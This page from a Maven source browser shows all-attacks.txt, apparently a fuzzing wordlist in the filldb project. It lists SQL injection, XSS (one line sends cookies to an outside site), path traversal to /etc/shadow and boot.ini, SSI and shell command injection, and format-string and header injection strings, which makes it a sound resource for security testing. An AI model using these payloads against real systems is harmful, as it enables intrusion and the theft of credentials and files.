• Home
• com.github.codemonstur
• filldb
• 0.2.1
• source code
• all-attacks.txt

×

Project download

Many resources are needed to download a project. Please understand that we have to compensate our server costs. Thank you in advance.
Project price only 1 $

You can buy this project and download/modify it how often you want.

lists.all-attacks.txt Maven / Gradle / Ivy

!
!'
!@#$%%^#$%#$@#$%$$@#$%^^**(()
!@#0%^#0##018387@#0^^**(()
"
" or "a"="a
" or "x"="x
" or 0=0 #
" or 0=0 --
" or 1=1 or ""="
" or 1=1--
"' or 1 --'"
") or ("a"="a
"]>&xxe;"
"]>&xxe;"
"]>&xxe;"
"]>&xxe;"
""
"SCRIPT]]>alert('XSS');/SCRIPT]]>"
"XSS"
"cript:alert('XSS')"">"
"]]>"
""
">
">
">xxx
yyy
"\t"
#
# a wide sample of malicious input for windows targets
# known cross platform source Code, file disclosure attack patterns - append after file or dir path
#'
#'
#xA
#xA#xD
#xD
#xD#xA
$NULL
$null
%
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
%00
%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
%00/
%00/etc/passwd%00
%01%02%03%04%0a%0d%0aADSF
%08x
%0A/usr/bin/id
%0A/usr/bin/id%0A
%0Aid
%0Aid%0A
%0a
%0a id %0a
%0a ping -i 30 127.0.0.1 %0a
%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+%0aRCPT+TO:+%0aDATA%0aFrom:+%0aTo:+%0aSubject:+tst%0afoo%0a%2e%0a
%0d
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+%0d%0aRCPT+TO:+%0d%0aDATA%0d%0aFrom:+%0d%0aTo:+%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
%0d%0aX-Injection-Header:%20AttackValue
%20
%20$(sleep%2050)
%20'sleep%2050'
%20d
%20n
%20s
%20x
%20|
%21
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%		25%5c..%25%5c..%255cboot.ini
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%	25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%2500
%250a
%26
%27%20or%201=1
%28
%29
%2A
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%2C
%2e
%2e%2e%2f
%2e0
%2f
%3C
%3C%3F
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
%3cscript%3ealert("XSS");%3c/script%3e
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%5C
%5C/
%5c
%60
%70
%7C
%7f
%99999999999s
%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d 
%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
%ff
%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
%oa ping -n 30 127.0.0.1 %0a
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
%s%p%x%d
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
&
& id
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
<
<
<
<
<
<
<
<
<
<







<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
'
'%20OR
&id
<
<
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
<!--#exec%20cmd="/usr/bin/id;-->
<!--#exec%20cmd="dir"-->
<>"'%;)(&+
<script>alert(document.cookie);<script>alert
<script>alert(document.cookie);
";id"
'
' (select top 1
' --
' ;
' UNION ALL SELECT
' UNION SELECT
' or ''='
' or '1'='1
' or '1'='1'--
' or 'x'='x
' or (EXISTS)
' or 0=0 #
' or 0=0 --
' or 1 in (@@version)--
' or 1=1 or ''='
' or 1=1--
' or a=a--
' or uid like '%
' or uname like '%
' or user like '%
' or userid like '%
' or username like '%
'%20or%201=1
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
'';!--"=&{()}
') or ('a'='a
') or ('x'='x
'--
'; exec master..xp_cmdshell
'; exec xp_regread
'; waitfor delay '0:30:0'--
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{}
';shutdown--
'>
'>
'hi' or 'x'='x';
'or select *
'sqlattempt1
'||UTL_HTTP.REQUEST
'||Utl_Http.request('http://') from dual--
(
(')
(sqlattempt2)
)
))))))))))
*
*'
*'
*(|(mail=*))
*(|(objectclass=*))
*/*
*|
+
+%00
,@variable
-
--
--';
--sp_password
-1
-1.0
-2
-20
-268435455
.
.%E2%73%70
..%%35%63
..%%35c
..%25%35%63
..%255c
..%5c
..%bg%qf
..%c0%af
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
..%u2215
..%u2216
../
../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../../boot.ini
../../../../../../../../../../windows/win.ini
../../../../../../../../conf/server.xml
../../boot.ini
..\
..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
..\..\..\..\..\..\..\..\..\..\windows\win.ini
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
/
/%00/
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
/%2A
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
/'
/'
/,%ENV,/
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
/.../.../.../.../.../
/../../../../../../../../%2A
/../../../../../../../../../../../boot.ini
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/../../../../../../../../../../../etc/passwd%00.html
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../bin/id|
/..\../..\../..\../..\../..\../..\../boot.ini
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
/./././././././././././boot.ini
/./././././././././././etc/passwd
/./././././././././././etc/shadow
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
//
//*
/boot.ini
/etc/passwd
/etc/shadow
/index.html|id|
0
0 or 1=1
00
0xfffffff
1
1 or 1 in (@@version)--
1 or 1=1--
1.0
1; waitfor delay '0:30:0'--
1;SELECT%20*
1||Utl_Http.request('http://') from dual--
2
2147483647
268435455
65536
:response.write 111111
;
; ping 127.0.0.1 ;
;/usr/bin/id\n
;echo 111111
;id
;id;
;id\n
;id|
;ls -la
;system('/usr/bin/id')
;system('cat%20/etc/passwd')
;system('id')
;|/usr/bin/id|
<
<  script > < / script>
SCRIPT]]>alert('XSS');/SCRIPT]]>
var n=0;while(true){n++;}]]>

<<
<<<
<
<>"'%;)(&+
]>&xxe;
]>&xxe;
]>&xxe;
]>&xxe;

SCRIPT]]>alert('XSS');/SCRIPT]]>
XSS
">




















','')); phpinfo(); exit;/*


<IMG SRC="javascript:alert('XSS')">
]]>


%0aBcc:
%0aCc:
%0d%0aBcc:
%0d%0aCc:
=
= '
= --
= ;
='
=--
=;
>
?*
?x=
?x="
?x=>
?x=|
@'
@'
@*
@variable
A
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
C:/boot.ini
C:/inetpub/wwwroot/global.asa
C:\boot.ini
C:\inetpub\wwwroot\global.asa
FALSE
NULL
PRINT
PRINT @@variable
TRUE
XXXXX.%p
XXXXX`perl -e 'print ".%p" x 80'`
[']
[']
\
\";alert('XSS');//
\"blah
\'
\'
\..\..\..\..\..\..\..\..\..\..\boot.ini
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
\0
\00
\00\00
\00\00\00
\0\0
\0\0\0
\\
\\'/bin/cat%20/etc/passwd\\'
\\'/bin/cat%20/etc/shadow\\'
\\/
\\\\*
\\\\?\\
\n/bin/ls -al\n
\n/usr/bin/id;
\n/usr/bin/id\n
\n/usr/bin/id|
\nid;
\nid\n
\nid|
\nnetstat -a%\n
\t
\u003C
\u003c
\x23
\x27
\x27UNION SELECT
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
\x3C
\x3D \x27
\x3D \x3B'
\x3c
^'
^'
`
`/usr/bin/id`
`dir`
`id`
`perl -e 'print ".%p" x 80'`%n
`ping 127.0.0.1`
a);/usr/bin/id
a);/usr/bin/id;
a);/usr/bin/id|
a);id
a);id;
a);id|
a)|/usr/bin/id
a)|/usr/bin/id;
a)|id
a)|id;
a;/usr/bin/id
a;/usr/bin/id;
a;/usr/bin/id|
a;id
a;id;
a;id|
admin'--
as
asc
bfilename
char%4039%41%2b%40SELECT
count(/child::node())
delete
desc
dir%00
dir%00|
distinct
echo 111111
exec sp
exec xp
handler
having
hi" or "a"="a
hi" or 1=1 --
hi") or ("a"="a
hi' or 'a'='a
hi' or 1=1 --
hi') or ('a'='a
http:///
id%00
id%00|
insert
like
limit
null
or
or 0=0 #
or 0=0 --
or 1=1--
or%201=1
or%201=1 --
order by
other
procedure
replace
response.write 111111
select
something%00html
t'exec master..xp_cmdshell 'nslookup www.google.com'--
to_timestamp_tz
truncate
tz_offset
update
x' or 1=1 or 'x'='y
x' or name()='username' or 'x'='y
xsstest
xsstest%00"<>'
{'}
{'}
|
| ping -i 30 127.0.0.1 |
| ping -n 30 127.0.0.1 |
|/bin/ls -al
|/usr/bin/id
|/usr/bin/id|
|dir
|dir|
|id
|id;
|id|
|ls
|ls -la
|nid\n
|usr/bin/id\n
||
|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
||/usr/bin/id;
||/usr/bin/id|
}